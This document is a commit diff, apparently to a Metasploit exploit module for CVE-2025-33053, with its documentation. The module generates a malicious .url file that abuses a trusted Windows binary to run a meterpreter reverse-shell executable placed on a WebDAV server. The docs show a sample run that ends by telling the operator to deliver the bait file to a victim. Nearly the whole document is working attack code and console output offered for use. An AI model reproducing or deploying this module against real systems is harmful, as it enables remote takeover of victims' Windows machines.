Add some features and fix all errors for CVE-2025-33053 exploit module

Author: DevBuiHieu

documentation/modules/exploit/windows/fileformat/cve_2025_33053.md

@@ -23,7 +23,7 @@ This behavior can be exploited to:
 
 ## Verification Steps
 
-1. Let the module setup WebDAV or do it manually
+1. Set up the WebDAV server.
 2. Use the module to generate a `.url` file
 3. Deliver the `.url` to the target (email, USB, zip)
 4. On victim machine, open `.url`
@@ -116,12 +116,23 @@ Optional:
 set WEBDAV_DIR /var/www/webdav
 set OUTFILE clickme.url
 set PAYLOAD windows/x64/meterpreter/reverse_http
-set START_LISTENER true
 run
 ```console
 
 ## Output
 
+msf6 > use exploit/windows/fileformat/cve_2025_33053
+[*] Using configured payload windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/cve_2025_33053) > set LHOST 192.168.1.15
+LHOST => 192.168.1.15
+msf6 exploit(windows/fileformat/cve_2025_33053) > run
+[*] Started reverse TCP handler on 192.168.1.15:4444 
+[*] Creating WebDAV directory if not exists...
+[+] Generating payload at: /var/www/webdav/payload.exe
+[+] Payload successfully written to /var/www/webdav/payload.exe
+[+] .URL file written to: /home/kali/bait.url
+[*] Module complete. Deliver /home/kali/bait.url to victim.
+
 Example .url file:
 
 ```console

modules/exploits/windows/fileformat/cve_2025_33053.rb

@@ -1,5 +1,3 @@
-require 'fileutils'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
@@ -8,8 +6,8 @@ def initialize(info = {})
       'Name'           => 'CVE-2025-33053 Exploit via Malicious .URL File and WebDAV',
       'Description'    => %q{
         This module creates a malicious .URL file that abuses CVE-2025-33053,
-        optionally sets up a WebDAV server, generates a payload, places it into
-        the WebDAV directory, and can launch a listener automatically.
+        optionally generates a payload, places it into
+        the WebDAV directory.
       },
       'Author'         => ['Dev Bui Hieu'],
       'License'        => MSF_LICENSE,
@@ -28,11 +26,8 @@ def initialize(info = {})
 
     register_options(
       [
-        OptString.new('LHOST', [true, 'Local host for reverse connection']),
-        OptInt.new('LPORT', [true, 'Local port for reverse connection', 4444]),
         OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
         OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
-        OptBool.new('START_LISTENER', [true, 'Start handler after setup', true]),
         OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav']),
         OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
         OptString.new('LOLBAS_EXE', [true, 'Path to trusted binary (LOLBAS)', 'C:\\Program Files\\Internet Explorer\\iediagcmd.exe']),
@@ -43,17 +38,20 @@ def initialize(info = {})
     )
   end
 
-  def run
+  def exploit
     lhost = datastore['LHOST']
     lport = datastore['LPORT']
     payload_type = datastore['PAYLOAD']
     webdav_dir = datastore['WEBDAV_DIR']
     gen_payload = datastore['GEN_PAYLOAD']
-    start_listener = datastore['START_LISTENER']
 
     print_status("Creating WebDAV directory if not exists...")
-    FileUtils.mkdir_p(webdav_dir) unless File.directory?(webdav_dir)
-
+    begin
+      FileUtils.mkdir_p(webdav_dir) unless File.directory?(webdav_dir)
+    rescue Errno::EACCES
+      fail_with(Failure::NoAccess, "Cannot create WebDAV directory. 🚫 Permission denied.\n💡 Try restarting Metasploit with sudo or change ownership of #{webdav_dir}.")
+    end
+    
     if gen_payload
       exe_path = File.join(webdav_dir, 'payload.exe')
       print_good("Generating payload at: #{exe_path}")
@@ -71,28 +69,32 @@ def run
       Modified=#{datastore['MODIFIED_HEX']}
     EOF
 
-    url_file = File.join(Msf::Config.local_directory, datastore['OUTFILE'])
+    url_file = File.expand_path(datastore['OUTFILE'])
     File.write(url_file, url_content)
     print_good(".URL file written to: #{url_file}")
 
-    if start_listener
-      print_status("Starting handler as background job...")
-      handler = framework.exploits.create('multi/handler')
-      handler.datastore['PAYLOAD'] = payload_type
-      handler.datastore['LHOST'] = lhost
-      handler.datastore['LPORT'] = lport
-      handler.exploit_simple('RunAsJob' => true)
-    end
-
     print_status("Module complete. Deliver #{url_file} to victim.")
   end
 
-  def generate_payload_exe(payload, lhost, lport, output_path)
-    exe = framework.payloads.create(payload)
-    exe.datastore['LHOST'] = lhost
-    exe.datastore['LPORT'] = lport
-    raw = exe.generate
-    exe_file = Rex::Text.to_win32pe(raw, exe.arch)
-    File.open(output_path, 'wb') { |f| f.write(exe_file) }
+  def generate_payload_exe(payload_name, lhost, lport, output_path)
+
+    payload = framework.payloads.create(payload_name.to_s.strip)
+
+    payload.datastore['LHOST'] = lhost
+    payload.datastore['LPORT'] = lport
+
+    raw = payload.generate
+
+    exe = Msf::Util::EXE.to_win32pe(framework, raw)
+
+    begin
+      File.open(output_path, 'wb') { |f| f.write(exe) }
+      print_good("Payload successfully written to #{output_path}")
+    rescue Errno::EACCES
+      fail_with(Failure::NoAccess, "Cannot write to #{output_path}. 🚫 Permission denied.\n💡 Try restarting Metasploit with sudo or change directory permissions.")
+    end
+  rescue => e
+    print_error("Failed to generate payload: #{e.class} #{e.message}")
   end
+
 end